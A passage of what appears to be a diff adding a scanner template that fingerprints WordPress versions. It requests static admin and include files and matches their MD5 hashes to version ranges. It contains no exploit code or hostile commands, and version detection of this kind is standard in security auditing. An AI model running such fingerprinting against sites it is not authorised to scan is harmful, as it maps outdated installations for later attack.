type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"24a0227fbdd3acfd86ff03fc3fc6c8a4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/loading.gif" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"76b326f4d44222126fee21076595bef5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/background.png" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"703c659e4bf563a05c6338a1727e006c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/skipback.png" + matchers: + - type: dsl + name: 4.1 - 4.8.15 + dsl: + - "(\"cd6dc830eb45b3a5a96bbc936ff54846\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/silverlightmediaelement.xap" + matchers: + - type: dsl + name: 
4.6 - 4.8.4 + dsl: + - "(\"d0e44fd6ecebca46f36d734b3012aa2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.12 + dsl: + - "(\"a83ab83a3d43222e4ba77cf96e0074aa\" == md5(body))" + - type: dsl + name: 3.6 - 4.1.21 + dsl: + - "(\"2fb1bc1a7f10d1dd54689a79b4cf53ac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/Jcrop.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5a8bfd37651305bdafbcf2cd51b0254b\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"7a4b4c6ebdb549fcbe47408f9457493e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.min.css" + matchers: + - type: dsl + name: 3.7 - 5.6 + dsl: + - "(\"56cc9ea201dc2f4b910e78bfacac9211\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1a6073b9ad2ed6318c1ff41a5aa76c04\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.min.js" + matchers: + - type: dsl + name: 3.7 - 5.6 + dsl: + - "(\"2f61ab984c177275c71e34ff1a17c102\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"23e42f2bd8a5b091d0eb8a80eeb79453\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/colorpicker.js" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f01017ca562067f4840eb2b6f99f2daf\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"3211fa8ad9b5ff52a438e30c3b7c2998\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"a513cd35728deb3db7dcb9b75da0a62d\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"b21badaea40428ee61a1cddc35b28fdc\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"760027c77e89c0a3761ddadb877b43b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"7e0c88f02dcaf2f78c90b4dc7827b709\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - 
"(\"d725b287d3d6816c20520a31924fde17\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"ebcf371dc5ff2088a4fe411ee8681466\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"a2a1f732cc34764c684ed521c6f3327c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"dfbe5c48845df8f039028b5a14a9a611\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"473611093dd8089b0ed33c199725a723\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"7f65dde79eb89e98aa8dbe67fa5febc2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"12d26c285b71d790f4b0c94423ef1f99\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"e33420c71c1a5c429069874d1de98a8b\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"6f2ff03edaa59c1a94be0874d08971ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"28806940c647cf671bebf4ae0630e570\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"b86135446ecf06e0ac722d6d8f403550\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"daa52e28bfd88f5fb5587f17e51a1325\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/loader.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"394bafc3cc4dfb3a0ee48c1f54669539\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/trans.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/object.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"f3726450d7457d750a2f4d9441c7ee20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"abd3613571800fdcc891181d5f34f840\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"552cfb3a29ac01a0d88b0422c5517159\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/embedded.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"f58daaa070dd4ea21bd6790f7ec36e22\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"56df04f9ee495d730f2dfa40e25773cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"6c2cd70b1c8972cf25b85e1e78a5251e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"02d304f1d603ee26a48d87d9a1361b34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"7852de09ac59b5589ed4dbdda4e4dee6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"729f6aed63765d3887313825b7159612\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/gallery.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"a1065fb19f8c105077f9b4501055db34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"52d0c08fe45aca3f662e81c738f5e209\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/video.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"d0c2b6f7a042a93d0d7abb1e83336ac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"a56c7a563660776d5a421c730b8dcfd6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/more.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"fcb7bcd40abc0a6d003bfc0fcbabe67a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"6071a32f55470b99fda01bf6aedd20f9\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5e93c2cc3619a9f9eaec32a5032a078e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"1ecaee31ec029ded0e18f576958a5214\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"7bce36bf2355513af7917c193e23ebd6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/audio.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"377e21e6dfe0008ef7c6d4fd2208770b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"e449e3da6dc51f85fc4c571179dd9348\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"24547f5689e6595dc6a12892296373a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/form_utils.js" + matchers: + - type: dsl + name: 4.8 - 5.6 + dsl: + - "(\"bf88fc6ca25582825493849f19fa4c69\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - 
"(\"f9c61354383f5a50a9a77b902dfdae7f\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"a32d1bbc44057b7dd0d2776ba2826b7c\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"337d7e2efe224c1c7da72d40b612d0a6\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"13541f120c5fa567e36f8e10d6ddcfed\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"e33f3bde78ed04cd3039cd41c669f0c7\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"950d229c37a570fc26a13da71d73f9b8\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"5608617efb4362005e16dc09e876192c\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"dfd2287b76c0dc5f2318662c6472401c\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"d823ee2d04bfe2203a8d96392988db6d\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"2c31e4a356777665e4cf2c586e01bd17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/editable_selects.js" + matchers: + - type: dsl + name: 4.8 - 5.6 + dsl: + - "(\"a14a93897132a4a24927c64a9739ff45\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"eb642a0aba7a8666a7b1472230fcb374\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"79087fabcb00132181650bd80666c085\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"8dd04768a81d784fbac5bb00876e808e\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"eae99e787007eaee6a7919bc2417f63a\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"6ae9d8d2ae563c29652b41b0ace13cc1\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"76f55e77dacb5ce55fb60ff56080d14c\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"80aeaa5b1ec8578fad591212a75d4b1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/license.txt" + matchers: + - type: dsl + name: 4.8 - 5.6 + dsl: + - 
"(\"6f9589e0c8df783acd1760d203bafffa\" == md5(body))" + - type: dsl + name: 3.2 - 4.7.19 + dsl: + - "(\"045d04e17422d99e338da75b9c749b7c\" == md5(body))" + - type: dsl + name: 2.1 - 3.1.4 + dsl: + - "(\"0571cf371683742c14f1735079a78e38\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"05e4631bdeac86095c93799f91d1a45d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/cropper.css" + matchers: + - type: dsl + name: 3.6 - 5.6 + dsl: + - "(\"6b79350bf46e0f692a4d1b2807ed0399\" == md5(body))" + - type: dsl + name: 2.1 - 3.5.2 + dsl: + - "(\"de9cb42ec723c60deb69440104800c22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/marqueeVert.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"ae9accf100a4b9930639adff52d4dcc7\" == md5(body))" + - type: dsl + name: 2.1 - 3.4.2 + dsl: + - "(\"2b2adfe6df6517f146b5b7c5b86eda42\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/marqueeHoriz.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"8cccae9c1ebafdb83be602e4d44c6f0a\" == md5(body))" + - type: dsl + name: 2.1 - 3.4.2 + dsl: + - "(\"9b4c27fccf817923f59b78fa6099c376\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/cropper.js" + matchers: + - type: dsl + name: 2.1 - 5.6 + dsl: + - "(\"1d97b296d918482e1273c56fbff6a8e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/marker.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"3313dc2a4f322fd43349329cfde8191e\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"3e9aa4c85a09fe868e23d2ffb260df46\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"4f932ddbee5d5e9ebd89a2ec63eda2d1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-center-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"9ebeb22df3728735042a4a37a1496611\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/images/icons32.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"d1dbac5be76d39851ce74aa134cc1aea\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"db0235502fde48e086e206c574c8adae\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"08ec8b870b908c7568ca488dca99efe6\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"a2f0d6d446fe3352c8d99267d5618de6\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"23c825ff877459a4339cf7a7b2258141\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/se.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"d6c89442c360bd1e08da2e7d1527373a\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"e9b50c73bfb3dc46a1eccf07f4bfc6ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"6a47fff5fee2f97bbf3eaf5e3b2482d3\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"197eb3dfa27be4df10b35a57c0a7dde7\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d88281faf9c249027c6d2a8991c9ffb5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-vs-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"4aa85a0c593cf769c7185911ae8462f8\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"a1331c4faa15c8d6fcb800eeec4c5500\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats32.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"57597e8f4f92f87bf02b5f4c896b453b\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"fbbcf81a2b6ce7e9e419fb639a8a2a24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5bace01f99903e3cf56bb27bd2ec2891\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - 
"(\"9110d8c847f942a166db598574a118c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-right.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"42d8f3e2874f6523d36c403a502b2276\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"f1c033dd4d0600bf18af7ed9a7441ea5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f5ea4194a79c23e653b24d0c65032e5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats32-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"b7742e45b6adea3547a54e1af3fe761c\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"b6c98d25500180cc6604d155f67651f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/imgedit-icons.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"4bd55c320b9fd9d8127da94789693b4f\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"45cbcb9891d6bcbf796e50fb6a6112db\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"fece88d437aba60350bce5273d4f1472\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-left.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5cfd7930cffa6412f75af26f2e689ed4\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"731f8ceb9ea5cf3ad41810cf0af73821\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c6b0f979b9e66fc338f4cb3853a5608a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a0baa50b279b79280c94acb65eb2426c\" == md5(body))" + - type: dsl + name: 2.5 - 3.3.3 + dsl: + - "(\"1a77b8aa7318b3e3b99e103aac47e448\" == md5(body))" + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"cc26f690d72afe4f2432d720e8fc6658\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/images/icons32-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"b525a42af908fafcf8cc07679ab4fabb\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"749a56fae96141ff576bb99c4037ebd9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9de25e2c0691e2662252640d68a58a86\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/list.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"1e123e96bd2a1ce2c0d3b305d153f1c3\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"cce19b15b4d3e4ad7dac568f1a1c1f90\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/w-logo-white.png" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"6ea6ccee4a0176dba27ebb79ac175c85\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"af2ae1a60e2c4bdbec69fe6c87c63cad\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d8d9f723f8f5254709712eb12ad74040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"972051f086017dcef17964622336840b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-right-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"6883026cbd3e72ba5da36c57c60fc078\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-none-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f858439905295bd705b09b2dba3418bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"23db5749e51d85105cb8d03fc81305c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/icons32-vs-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"a12a3034ff4734469709265a83697d22\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - 
"(\"4487c15d43389e88b3694803e2beaeb7\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"070f2b5a2faa29998e2ce1a91f0508d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-center.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"09d91addb6b53479e68c645931d9658e\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"a1427c5dd8d6f9292430f6650824270a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-none.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f1ad65716432a0a1da7591a5c2f10d04\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"de2bd2479bc66930d4db049e91b7451a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"7fda76920124f03e88d1dfd93e03bf59\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"9e6974860b99cef7eeb3b90e9e87f26a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/generic.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f88e1b95ff278a5b231f39380b211ed0\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"ec85cdf6efc2a983e50f7d86a976c467\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo.svg" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"f34ef6259364f7ef0ccf67cd1dddc970\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"b4419d2f79449b65dfe7036ef91cd1e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/browser.png" + matchers: + - type: dsl + name: 4.3 - 5.6 + dsl: + - "(\"c1b2f9c29eb54b1f5c0284629524fe46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/browser-rtl.png" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"442291d9d3a041e41aaefebfbf25cc9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/yes.png" + matchers: + 
- type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c42bf814a237dc89970d715ae8516b13\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"94040f30512d9d0993f0b903b25024e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"e10d8139230f1f8b64f35960098f8cff\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"48b8c0d56811b724ea34d7f052a126b3\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"dc29872da04b485add10ad8bd5c2e12b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a6bc94f353aca3414b8d5eff539e4015\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"398887656a35c9956217380dc4e32d8c\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"1a36e748b6be3b15dfaa18b2149beefe\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"64327786ea2b3ac2bb12f54c698e5221\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/imgedit-icons-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"2ce3ee2783a33655a6bdfd9dc3cce174\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"22675b63c33b6e9b2a63e84018f44a0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-left-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"698538b14fb9839aecd01d5e97c66316\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-grey-bubble-2x.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"9d5459d3c59d32b602732c0df56d83bf\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e1334238affb186ad35b2a79f8739e94\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-grey-bubble.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"8f59128f2a27b489b0a974c0b6b21046\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - 
"(\"165ba7d3a093473cf47a6b0fbd141dbb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/icons32-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"052cd6502a05e7d3f17b3e76a5b15566\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"d5a8c1950e1a20172151f463c8d9d489\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"a9a5cf708efb664e3bc3f216daec12ec\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"091cecbcaf2277683ad3c3a06d6d33dc\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"74426dbce10c55709c4877554d455c4e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"b2b6c3e336054070e8927a5e7965f3ce\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"970192c8af45d58e092c4e20f60ca059\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/no.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c86bbf1c64c924f99fdc9f5637f0c08b\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"f787d0b0069027fc7b571dbbdabaa3c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"a68f53a66c93f4485ca9acafaffc81e6\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"24726acea48e9bffc1744638f2d1f666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"719980f24cf02c0c5fa53b312fef45ac\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"73affbee3e5e3aec19199a657b4f88f7\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"016631a0b568350ef294f7aa9f44e0af\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"20243e9888a8e85e47320f5e10ec663d\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - 
